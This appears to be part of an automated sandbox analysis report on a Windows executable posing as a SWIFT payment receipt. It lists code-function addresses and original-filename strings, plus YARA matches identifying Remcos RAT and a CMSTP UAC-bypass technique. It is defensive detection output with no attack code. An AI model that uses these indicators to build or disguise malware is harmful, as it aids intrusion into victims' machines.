                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06EF77080_2_06EF7708
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06EFF4080_2_06EFF408
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06EFAC010_2_06EFAC01
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06EFAC100_2_06EFAC10
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06EFDDE30_2_06EFDDE3
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06EF654D0_2_06EF654D
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06EF65210_2_06EF6521
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06EF8AC90_2_06EF8AC9
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06EF5A600_2_06EF5A60
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06EFB2790_2_06EFB279
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06EF9A080_2_06EF9A08
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06EFE3D80_2_06EFE3D8
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06EFEB900_2_06EFEB90
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06EFB0A80_2_06EFB0A8
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06EFE0A80_2_06EFE0A8
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06EFB0990_2_06EFB099
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06EFE0980_2_06EFE098
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06EF99F90_2_06EF99F9
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06F4F7B00_2_06F4F7B0
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06F405F00_2_06F405F0
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06F400400_2_06F40040
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06F405E00_2_06F405E0
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06F475E80_2_06F475E8
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06F492C00_2_06F492C0
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06F4A0780_2_06F4A078
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06F4904F0_2_06F4904F
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06F400070_2_06F40007
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06F47E580_2_06F47E58
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06F47A200_2_06F47A20
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 0_2_06F47A110_2_06F47A11
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 7_2_100171947_2_10017194
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 7_2_1000B5C17_2_1000B5C1
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_02C23E289_2_02C23E28
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_02C2E1049_2_02C2E104
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_02C26F9F9_2_02C26F9F
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_060A7A089_2_060A7A08
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_060A74489_2_060A7448
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_060A74589_2_060A7458
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_075865C09_2_075865C0
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_0758DDF09_2_0758DDF0
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_0758F4189_2_0758F418
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_07587CAA9_2_07587CAA
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_07588B289_2_07588B28
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_0758E3E89_2_0758E3E8
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_075877089_2_07587708
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 9_2_0758E7D09_2_0758E7D0
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 9_2_0758E7E0
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 9_2_0758AE18
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 9_2_0758AE08
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 9_2_0758654D
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 9_2_07586521
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 9_2_0758DDE2
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 9_2_0758AC10
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 9_2_0758F408
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 9_2_0758AC01
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 9_2_0758E3D8
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 9_2_0758EB90
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 9_2_0758B279
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 9_2_07587271
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 9_2_07585A60
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 9_2_07588A10
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 9_2_07589A08
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 9_2_07588ACA
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 9_2_075899F9
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 9_2_0758E098
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 9_2_0758B099
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 9_2_0758B0A8
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 9_2_0758E0A8
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 9_2_07790040
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 9_2_0779EA07
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 9_2_077905F0
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 9_2_077975E8
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 9_2_077905E0
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 9_2_077992C0
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 9_2_0779A078
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 9_2_0779904F
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 9_2_07790007
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 9_2_07797E58
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 9_2_07792CD8
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 9_2_07797A20
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 9_2_07797A11
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 12_2_004520E2
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 12_2_0041D081
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 12_2_0043D0A8
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 12_2_00437160
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 12_2_004361BA
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 12_2_00426264
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 12_2_00431387
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 12_2_0043652C
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 12_2_0041E5EF
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 12_2_0044C749
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 12_2_004367D6
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 12_2_004267DB
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 12_2_0043C9ED
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 12_2_00432A59
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 12_2_00436A9D
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 12_2_0043CC1C
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 12_2_00436D58
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 12_2_00434D32
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 12_2_0043CE4B
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 12_2_00440E30
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 12_2_00426E83
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 12_2_00412F45
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 12_2_00452F10
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: 12_2_00426FBD
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 15_2_0044B040
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 15_2_0043610D
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 15_2_00447310
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 15_2_0044A490
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 15_2_0040755A
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 15_2_0043C560
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 15_2_0044B610
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 15_2_0044D6C0
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 15_2_004476F0
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 15_2_0044B870
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 15_2_0044081D
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 15_2_00414957
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 15_2_004079EE
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 15_2_00407AEB
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 15_2_0044AA80
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 15_2_00412AA9
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 15_2_00404B74
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 15_2_00404B03
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 15_2_0044BBD8
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 15_2_00404BE5
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 15_2_00404C76
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 15_2_00415CFE
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 15_2_00416D72
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 15_2_00446D30
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 15_2_00446D8B
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 15_2_00406E8F
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 17_2_00405038
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 17_2_0041208C
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 17_2_004050A9
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 17_2_0040511A
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 17_2_0043C13A
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 17_2_004051AB
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 17_2_00449300
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 17_2_0040D322
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 17_2_0044A4F0
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 17_2_0043A5AB
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 17_2_00413631
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 17_2_00446690
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 17_2_0044A730
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 17_2_004398D8
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 17_2_004498E0
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 17_2_0044A886
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 17_2_0043DA09
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 17_2_00438D5E
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 17_2_00449ED0
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 17_2_0041FE83
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 17_2_00430F54
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 18_2_004050C2
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 18_2_004014AB
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 18_2_00405133
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 18_2_004051A4
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 18_2_00401246
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 18_2_0040CA46
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 18_2_00405235
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 18_2_004032C8
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 18_2_00401689
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: 18_2_00402F60
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: String function: 004169A7 appears 87 times
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: String function: 0044DB70 appears 41 times
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: String function: 004165FF appears 35 times
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: String function: 00422297 appears 42 times
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: String function: 00444B5A appears 37 times
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: String function: 00413025 appears 79 times
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe | Code function: String function: 00416760 appears 69 times
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: String function: 00401F66 appears 50 times
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: String function: 004020E7 appears 39 times
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: String function: 004338B5 appears 41 times
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exe | Code function: String function: 00433FC0 appears 55 times
                Source: SwiftCopy_PaymtRecpt121228.exe, 00000000.00000000.2032689413.00000000002E6000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamepUIh.exe: vs SwiftCopy_PaymtRecpt121228.exe
                Source: SwiftCopy_PaymtRecpt121228.exe, 00000000.00000002.2067092398.0000000003684000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameArthur.dll" vs SwiftCopy_PaymtRecpt121228.exe
                Source: SwiftCopy_PaymtRecpt121228.exe, 00000000.00000002.2067092398.00000000040F1000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs SwiftCopy_PaymtRecpt121228.exe
                Source: SwiftCopy_PaymtRecpt121228.exe, 00000000.00000002.2073657775.0000000007130000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameArthur.dll" vs SwiftCopy_PaymtRecpt121228.exe
                Source: SwiftCopy_PaymtRecpt121228.exe, 00000000.00000002.2073865693.0000000008E60000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameMontero.dll8 vs SwiftCopy_PaymtRecpt121228.exe
                Source: SwiftCopy_PaymtRecpt121228.exe, 00000000.00000002.2065392468.000000000082E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs SwiftCopy_PaymtRecpt121228.exe
                Source: SwiftCopy_PaymtRecpt121228.exe | Binary or memory string: OriginalFileName vs SwiftCopy_PaymtRecpt121228.exe
                Source: SwiftCopy_PaymtRecpt121228.exe, 00000012.00000002.4043408926.000000000041B000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenamemspass.exe8 vs SwiftCopy_PaymtRecpt121228.exe
                Source: SwiftCopy_PaymtRecpt121228.exe | Binary or memory string: OriginalFilenamepUIh.exe: vs SwiftCopy_PaymtRecpt121228.exe
                Source: SwiftCopy_PaymtRecpt121228.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.43e2100.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.43e2100.3.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.43e2100.3.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 12.2.eaJOpx.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 12.2.eaJOpx.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 12.2.eaJOpx.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 9.2.eaJOpx.exe.4a3a0e0.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 9.2.eaJOpx.exe.4a3a0e0.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 9.2.eaJOpx.exe.4a3a0e0.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 12.2.eaJOpx.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 12.2.eaJOpx.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 12.2.eaJOpx.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.4369ae0.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.4369ae0.2.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.4369ae0.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 9.2.eaJOpx.exe.4ab2700.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 9.2.eaJOpx.exe.4ab2700.2.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 9.2.eaJOpx.exe.4ab2700.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.43e2100.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0.2.SwiftCopy_PaymtRecpt121228.exe.43e2100.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 9.2.eaJOpx.exe.4ab2700.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 9.2.eaJOpx.exe.4ab2700.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
